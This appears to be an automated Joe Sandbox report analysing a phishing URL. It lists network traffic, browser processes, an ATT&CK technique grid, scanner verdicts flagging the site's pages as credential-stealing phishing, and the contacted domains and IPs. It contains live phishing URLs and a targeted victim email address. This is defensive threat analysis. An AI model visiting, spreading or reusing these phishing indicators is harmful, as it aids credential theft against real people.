          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58523
          Source: unknownNetwork traffic detected: HTTP traffic on port 58571 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58526
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58525
          Source: unknownNetwork traffic detected: HTTP traffic on port 58497 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58498
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58531
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58497
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58530
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58533
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58499
          Source: unknownNetwork traffic detected: HTTP traffic on port 58509 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58532
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58653
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58494
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58496
          Source: unknownNetwork traffic detected: HTTP traffic on port 58512 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58495
          Source: unknownNetwork traffic detected: HTTP traffic on port 58642 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58490
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58492
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58491
          Source: unknownNetwork traffic detected: HTTP traffic on port 58526 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58488 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58522 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58480 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58516 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58534
          Source: unknownNetwork traffic detected: HTTP traffic on port 58494 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58502 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58634 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58479 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58525 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58565 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58485 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58513 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58507 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58556 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58640 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58531 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58499 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58510 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58491 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 58514 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58482 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58556
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58508 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58565
          Source: unknownNetwork traffic detected: HTTP traffic on port 58511 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58643 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58530 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58496 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58527 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 58519 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 58649 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 58487 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58533 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58571
          Source: unknownNetwork traffic detected: HTTP traffic on port 58618 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58505 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58635 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: classification engineClassification label: mal84.phis.win@23/94@34/14
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2004,i,16542891561476975858,14649593030088590238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2004,i,16542891561476975858,14649593030088590238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Browser Extensions
          1
          Process Injection
          1
          Process Injection
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://bs32c.golfercaps.com/vfd23ced/assets/jquery.menu.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_checked_focused.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/next.php100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_checked.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/jquery-ui.structure.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_focused.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/meBubble.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/cdn-cgi/challenge-platform/h/b/flow/ov1/609964090:1735593069:6S3mpcqO1yILRgRXR0r0LjFCdbuSQ6cKt2unSWD0J4k/8fa532e0b89f421c/dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hP100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_emptyall_focused.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/_.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.datepicker.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/loginPage18.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischecked_focused.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all_focused.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/favicon.ico100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/jquery-ui.theme.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischecked.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_required_focused.png100%Avira URL Cloudphishing
          https://eyjhbgcioijiuzi1niisinr5cci6ikpxvcj9eyj1c2vdxtrdttgyypppkkj8hii.s3-web.eu-gb.cloud-object-st0%Avira URL Cloudsafe
          https://bs32c.golfercaps.com/vfd23ced/assets/login.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.autocomplete.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/bg.jpg100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_checked.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_checked_focused.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_emptyall.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8fa532e0b89f421c100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_required.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_empty_focused.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.dialog.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_empty.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischeckedall_focused.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/mePanel.css100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all_sthischecked.png100%Avira URL Cloudphishing
          https://bs32c.golfercaps.com/vfd23ced/assets/image.png100%Avira URL Cloudphishing
          NameIPActiveMaliciousAntivirus DetectionReputation
          stackpath.bootstrapcdn.com
          104.18.10.207
          truefalse
            high
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              code.jquery.com
              151.101.130.137
              truefalse
                high
                bs32c.golfercaps.com
                188.114.96.3
                truetrue
                  unknown
                  cdnjs.cloudflare.com
                  104.17.24.14
                  truefalse
                    high
                    challenges.cloudflare.com
                    104.18.94.41
                    truefalse
                      high
                      maxcdn.bootstrapcdn.com
                      104.18.10.207
                      truefalse
                        high
                        www.google.com
                        142.250.186.132
                        truefalse
                          high
                          www.dhl.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://a.nel.cloudflare.com/report/v4?s=ulQbx3OJP6nXx0BIib9N6HdYIXGwmIVjIZHatCrEt7PC8cmZtHV4TtwWz6AtA1mmEEcTrKHtBQ1kcsFdjeun6Wt%2FDkRYhOOA5nVQOZ4E3G%2Bw4ikIhs847y6JkcwNyzGV8q8Zld6Suw%3D%3Dfalse
                              high
                              https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_checked_focused.pngtrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://bs32c.golfercaps.com/vfd23ced/next.phptrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://bs32c.golfercaps.com/vfd23ced/assets/meBubble.csstrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8fa532ef18b9435c/1735594940553/NTUnkiFwsG_vUbHfalse
                                high
                                https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                  high
                                  https://bs32c.golfercaps.com/vfd23ced/true
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://bs32c.golfercaps.com/vfd23ced/assets/jquery.menu.csstrue
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_checked.pngtrue
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://a.nel.cloudflare.com/report/v4?s=jPIXxCltmBBULJ8FBX8OjyVqWbtk2qN9bijXNg4yLfjXVpVPcNycE0evqGnrECwDMlXOmH3BTWAJrErXBuBko38dsZAcElM1tdtUxErpLnCtwXLOEQPUOT6moAx1QQMGhSQg6PA8bA%3D%3Dfalse
                                    high
                                    https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_emptyall_focused.pngtrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_focused.pngtrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://bs32c.golfercaps.com/cdn-cgi/challenge-platform/h/b/flow/ov1/609964090:1735593069:6S3mpcqO1yILRgRXR0r0LjFCdbuSQ6cKt2unSWD0J4k/8fa532e0b89f421c/dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hPtrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://bs32c.golfercaps.com/vfd23ced/assets/jquery-ui.structure.csstrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.datepicker.csstrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://bs32c.golfercaps.com/vfd23ced/assets/_.csstrue
                                    • Avira URL Cloud: phishing
                                    unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                      high
                                      https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischecked_focused.pngtrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://bs32c.golfercaps.com/vfd23ced/assets/loginPage18.csstrue
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/vopiq/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/false
                                        high
                                        https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all.pngtrue
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all_focused.pngtrue
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked.pngtrue
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischecked.pngtrue
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                          high
                                          https://bs32c.golfercaps.com/favicon.icotrue
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://bs32c.golfercaps.com/vfd23ced/assets/jquery-ui.theme.csstrue
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_required_focused.pngtrue
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://bs32c.golfercaps.com/vfd23ced/assets/login.csstrue
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_emptyall.pngtrue
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8fa532ef18b9435c/1735594940555/c281c98da1c4ac9f168264b8621e465a54d01427d1008fed8de2e3729547d7f2/f_xc1VlLEk-hP_tfalse
                                            high
                                            https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.csstrue
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/404157209:1735593090:PkZ6LfythNHPr79mCMt43ygV4Jt_HfPkfi_yir-aMeY/8fa532ef18b9435c/c5n.2QPsOfIcLwMXbdQYrbHlLiukXQ1i_.C1_tbXgow-1735594938-1.1.1.1-YpojflswdDcU2Qa5EQBSQn7CvS2Y13qHu8rjKzZWOLrUr9SVmp.uSlaks2qKCMkHfalse
                                                high
                                                https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_checked_focused.pngtrue
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.autocomplete.csstrue
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://a.nel.cloudflare.com/report/v4?s=AU249RWVWZn2ffQ1wYMTlvjCqHYBdvRNSSthIU8p%2FG4730ZdRrVtVG94n7XZfOfslr8eamZQCN2AyjQfZSGDuD97SzhOUnX0PJ1Cx23U%2FH6Uoc2Nf0E3K56fzi5aRKa1be5HLxQqeg%3D%3Dfalse
                                                  high
                                                  https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_checked.pngtrue
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://bs32c.golfercaps.com/vfd23ced/assets/bg.jpgtrue
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://bs32c.golfercaps.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8fa532e0b89f421ctrue
                                                  • Avira URL Cloud: phishing
                                                  unknown
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fa532ef18b9435c&lang=autofalse
                                                    high
                                                    https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_not_checked_required.pngtrue
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_empty_focused.pngtrue
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                      high
                                                      https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comtrue
                                                        unknown
                                                        https://bs32c.golfercaps.com/vfd23ced/assets/axit-jquery.dialog.csstrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://bs32c.golfercaps.com/vfd23ced/assets/icon_radio_empty.pngtrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_all_sthischecked.pngtrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://bs32c.golfercaps.com/vfd23ced/assets/icon_check_sthischeckedall_focused.pngtrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://bs32c.golfercaps.com/vfd23ced/assets/mePanel.csstrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        https://bs32c.golfercaps.com/vfd23ced/assets/image.pngtrue
                                                        • Avira URL Cloud: phishing
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://github.com/twbs/bootstrap/graphs/contributors)chromecache_84.2.dr, chromecache_82.2.dr, chromecache_112.2.dr, chromecache_64.2.drfalse
                                                          high
                                                          http://opensource.org/licenses/MIT).chromecache_102.2.dr, chromecache_106.2.drfalse
                                                            high
                                                            https://eyjhbgcioijiuzi1niisinr5cci6ikpxvcj9eyj1c2vdxtrdttgyypppkkj8hii.s3-web.eu-gb.cloud-object-stchromecache_68.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://getbootstrap.com/)chromecache_82.2.dr, chromecache_64.2.drfalse
                                                              high
                                                              https://getbootstrap.com)chromecache_84.2.dr, chromecache_112.2.drfalse
                                                                high
                                                                https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_84.2.dr, chromecache_82.2.dr, chromecache_112.2.dr, chromecache_64.2.drfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.17.24.14
                                                                  cdnjs.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  104.18.10.207
                                                                  stackpath.bootstrapcdn.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  104.18.94.41
                                                                  challenges.cloudflare.comUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  104.18.95.41
                                                                  unknownUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  151.101.130.137
                                                                  code.jquery.comUnited States
                                                                  54113FASTLYUSfalse
                                                                  104.18.11.207
                                                                  unknownUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  239.255.255.250
                                                                  unknownReserved
                                                                  unknownunknownfalse
                                                                  188.114.97.3
                                                                  unknownEuropean Union
                                                                  13335CLOUDFLARENETUSfalse
                                                                  188.114.96.3
                                                                  bs32c.golfercaps.comEuropean Union
                                                                  13335CLOUDFLARENETUStrue
                                                                  142.250.186.132
                                                                  www.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  35.190.80.1
                                                                  a.nel.cloudflare.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  151.101.194.137
                                                                  unknownUnited States
                                                                  54113FASTLYUSfalse
                                                                  104.17.25.14
                                                                  unknownUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  IP
                                                                  192.168.2.4
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1582581
                                                                  Start date and time:2024-12-30 22:41:11 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 3m 23s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:browseurl.jbs
                                                                  Sample URL:https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal84.phis.win@23/94@34/14
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 142.250.186.67, 142.250.186.174, 74.125.133.84, 142.250.185.78, 172.217.18.14, 2.22.50.131, 192.229.221.95, 142.250.185.110, 216.58.212.174, 142.250.184.234, 142.250.186.42, 216.58.206.42, 172.217.18.10, 142.250.185.202, 142.250.186.74, 142.250.185.170, 142.250.185.138, 216.58.206.74, 142.250.186.170, 142.250.185.74, 142.250.184.202, 142.250.185.234, 142.250.186.138, 142.250.181.234, 142.250.74.202, 142.250.185.106, 142.250.186.78, 142.250.181.238, 104.102.55.244, 142.250.184.238, 142.250.186.131, 142.250.185.174, 184.28.90.27, 4.175.87.197, 13.107.246.45
